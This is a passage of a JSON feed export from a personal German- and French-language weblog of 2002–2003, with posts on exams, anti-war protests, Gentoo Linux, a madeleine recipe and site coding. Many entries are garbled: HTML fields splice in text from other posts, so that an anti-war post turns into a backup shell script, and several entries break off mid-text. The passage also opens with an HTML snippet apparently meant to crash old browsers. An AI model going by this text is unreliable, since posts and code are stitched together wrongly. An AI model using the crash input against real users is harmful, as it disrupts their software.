<html><form><input type crash></form></html>", "url": "https://blog.x-way.org/Misc/2003/04/23/45.html", "tags": ["Misc"], "date_published": "2003-04-23T02:42:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=323948", "title": "Ferienstress", "content_text": "Nach Gymerfest und einer sonnigen Woche in Gumaglio im Maggiatal im Tessin, in der wir leider nur fĂŒr die anstehenden MaturaprĂŒfungen lernten, steht jetzt die zweite Ferienwoche bevor, in der ich wieder so viel zu tun habe, dass wahrscheinlich nicht mehr viel Zeit fĂŒrs Internet, Weblog etc. ĂŒbrigbleibt.Ich versuche nicht wie rm gleich alles einzustellen (was fĂŒr mich sicher auch die bessere Wahl wĂ€re *g*), sondern quasi live ausm PrĂŒffungsstress euch etwas mitzuteilen, dies jedoch nicht mehr so oft wie auch schon ;-)", "content_html": "Nach Gymerfest und einer sonnigen Woche in Gumaglio im Maggiatal im Tessin, in der wir leider nur fĂŒr die anstehenden MaturaprĂŒfungen lernten, steht jetzt die zweite Ferienwoche bevor, in der ich wieder so viel zu tun habe, dass wahrscheinlich nicht mehr viel Zeit fĂŒrs Internet, Weblog etc. ĂŒbrigbleibt.
Chronik eines angekĂŒndigten Krieges
Weitere PDFs zur Weltpolitik findet man hier und hier.
", "url": "https://blog.x-way.org/Misc/2003/03/26/Bush_Blair_assasins_mais_lONU_ne_fait_rien.html", "tags": ["Misc"], "date_published": "2003-03-26T23:34:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=289", "title": "So siehts aus", "content_text": "gi hat ein Bild der Welt gemacht.", "content_html": "gi hat ein Bild der Welt gemacht.", "url": "https://blog.x-way.org/Misc/2003/03/23/So_siehts_aus.html", "tags": ["Misc"], "date_published": "2003-03-23T21:27:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=287", "title": "Tous ensemble, tous ensemble, non à la guerre!", "content_text": "Jeudi et vendredi j'étais à Lausanne pour visiter les 'journées des gymnasien(ne)s' à l'EPFL. Bon, je pense que je ferais là mes études.Déjà à 9 heures le matin, en traversant la place de la gare on entendait 'les voix de la manifestation' mais je n'avais pas le temps pour y participer. Le vendredi je me suis bien informé sur les études en informatique. Donc aujoud'hui je suis allé à Berne à la manifestation nationale contre la guerre.", "content_html": "Jeudi et vendredi j'étais à Lausanne pour visiter les 'journées des gymnasien(ne)s' à l'EPFL. Bon, je pense que je ferais là mes études.today=`date +%d%b%Y`backup_path=/backuptar -cvf $backup_path/backup_$today.tar `find /home /www /root -newer $backup_path ! -name *~ ! -type d -print` > $backup_path/backup_$today.tocDieses Shellscript macht ein tar-file mit den Dateien aus /home, /www und /root, die seit dem letzten Backup verÀndert wurden und legt dieses unter /backup ab inklusive einer Inhaltsangabe :-)", "url": "https://blog.x-way.org/Linux/2003/02/01/Backup.html", "tags": ["Linux"], "date_published": "2003-02-01T03:05:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=262", "title": "Die Aussicht geniessen", "content_text": "", "content_html": "", "url": "https://blog.x-way.org/Misc/2003/01/31/Die_Aussicht_geniessen.html", "tags": ["Misc"], "date_published": "2003-01-31T03:25:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=261", "title": "UT-ig", "content_text": "Jetzt lÀuft nebst UT auch UT2003 mit Gentoo :-)Screenshots und Framerates gibts (noch) nicht ;-P", "content_html": "Jetzt lÀuft nebst UT auch UT2003 mit Gentoo :-)
suroot-passwortcat /dev/mouse > /dev/Pfad zum Drucker", "url": "https://blog.x-way.org/Linux/2003/01/21/Spinnerei.html", "tags": ["Linux"], "date_published": "2003-01-21T00:23:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=254", "title": "Alimentarium", "content_text": "Dimanche on était à Vevey dans l'Alimentarium. C'est une musée trÚs intéressant et trÚs recommandable!On y pouvait faire des Madeleines avec cette recette:Madeleines à l'huile d'oliveSelon une recette espagnolePour 9 à 12 moules1 oeuf110 g sucre85 g huile d'olive150 g farine1/2 c. à café poudre à lever75 ml de lait1 pincée selMélanger le sucre, l'oeuf, le sel.Mélanger la poudre à lever avec la farine.Incorporer alternativement le mélange poudre à lever-farine, l'huile, le lait.Si on préfÚre une texture fine, ne pas trop battre la pùte.Au contraire, pour qu'elle forme une belle boule sur le dessus, travailler la pùte au moins 5 min au batteur électrique.Graisser les moules au pinceau avec un peu d'huile.Remplir les moules aux trois quarts.Cuisson: env. 15 min à 180°C", "content_html": "Dimanche on était à Vevey dans l'Alimentarium. C'est une musée trÚs intéressant et trÚs recommandable!
emerge -u worlddie installierten Programme aktualisiert werden.
mke2fs -j /dev/hda6und diesem Eintrag in /etc/fstab
/dev/hda6 /usr/local/games ext3 noatime,user 0 0wiederbelebt ;-)", "url": "https://blog.x-way.org/Linux/2003/01/08/Am_Umsteigen.html", "tags": ["Linux"], "date_published": "2003-01-08T16:29:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=242", "title": "Eisig", "content_text": "Als ich heute Morgen um 10 vor 6 frischgeduscht zum Bahnhof rannte, musste ich feststellen, dass meine noch nicht ganz getrockneten Haare gefrohren waren!", "content_html": "Als ich heute Morgen um 10 vor 6 frischgeduscht zum Bahnhof rannte, musste ich feststellen, dass meine noch nicht ganz getrockneten Haare gefrohren waren!", "url": "https://blog.x-way.org/Misc/2003/01/07/Eisig.html", "tags": ["Misc"], "date_published": "2003-01-07T16:57:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=241", "title": "LingoFox (r)", "content_text": "Michael hat eine evtl. sehr hilfreiche Website gefunden: Verben konjugieren mit LingoFox dem KonjugatorLeider darf man wÀhrend den Franz.-Proben nicht ins Internet *g*", "content_html": "Michael hat eine evtl. sehr hilfreiche Website gefunden: Verben konjugieren mit LingoFox dem Konjugator
telnet blinkenlights.nl
Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90; AT&T WNS5.2)und schon kann ich mein XML-Logfile nicht mehr ansehen, weils nicht mehr Standardkonform ist :-(", "url": "https://blog.x-way.org/Misc/2002/11/09/Ach_menno.html", "tags": ["Misc"], "date_published": "2002-11-09T20:34:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=155", "title": "Nicht interessant ;-)", "content_text": "Heut ist ja der 9.11. und wenn man die Zahlen vertauscht ist der ...", "content_html": "Heut ist ja der 9.11. und wenn man die Zahlen vertauscht ist der ...", "url": "https://blog.x-way.org/Misc/2002/11/09/Nicht_interessant_-.html", "tags": ["Misc"], "date_published": "2002-11-09T20:31:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=154", "title": "Réglage (!!) -->", "content_text": "J'ai changé un peu mon systÚme du weblog. Vous pouvez maintenant changer la langue de la navigation et du contenu, le nombre des entrées montrées. Et si vous faites un commentaire, votre nom, votre e-mail et votre website seraient mémorisés.", "content_html": "J'ai changé un peu mon systÚme du weblog. Vous pouvez maintenant changer la langue de la navigation et du contenu, le nombre des entrées montrées. Et si vous faites un commentaire, votre nom, votre e-mail et votre website seraient mémorisés.", "url": "https://blog.x-way.org/Coding/2002/11/09/Reglage__--.html", "tags": ["Coding"], "date_published": "2002-11-09T18:24:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=153", "title": "Einstellungen (!!) -->", "content_text": "ich hab noch mal ein bisschen gebastelt. Rausgekommen ist, dass man nun unter Einstellungen einstellen kann, in welcher Sprache die Navigation erscheinen soll, in welcher Sprache die Inhalte erscheinen sollen und wieviele EintrÀge auf der Startseite angezeigt werden.Desweiteren werden nun Name, E-Mail und Website beim kommentieren gespeichert.All das funktioniert via ein Cookie, daher bitte aktivieren, wer davon Gebrauch machen möchte.", "content_html": "ich hab noch mal ein bisschen gebastelt. Rausgekommen ist, dass man nun unter Einstellungen einstellen kann, in welcher Sprache die Navigation erscheinen soll, in welcher Sprache die Inhalte erscheinen sollen und wieviele EintrÀge auf der Startseite angezeigt werden.
$layout = new layout('plain', 1,);
funktioniert definitiv nicht.header(\"Location: suche.php?q=\".$GoogleQuery);umleiten kann. Weshalb das? Damit die Links von Google, welche manchmal auf EintrĂ€ge zeigen, die nicht mehr auf der index.php sind, fĂŒr den Benutzer doch etwas bringen.", "url": "https://blog.x-way.org/Coding/2002/10/27/Des_Raetsels_Loesung.html", "tags": ["Coding"], "date_published": "2002-10-27T00:04:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=125", "title": "Nun ist so wie's sein muss!", "content_text": "waterwave.ch ist nun XHTML 1.0 konform und in punkto Accessibility auch nicht schlecht gestellt.Ich wĂ€re froh, wenn jemand mit einer Software wie JAWS mal schauen könnte, ob waterwave.ch noch Probleme darstellt.Sonstige Accesibility-Tips sind natĂŒrlich auch willkommen ;-)", "content_html": "waterwave.ch ist nun XHTML 1.0 konform und in punkto Accessibility auch nicht schlecht gestellt.